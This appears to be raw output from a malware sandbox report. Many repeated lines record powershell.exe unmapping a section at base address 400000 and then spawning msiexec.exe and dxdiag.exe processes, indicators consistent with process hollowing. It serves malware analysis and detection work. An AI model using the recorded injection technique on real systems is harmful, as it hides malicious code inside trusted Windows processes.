    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
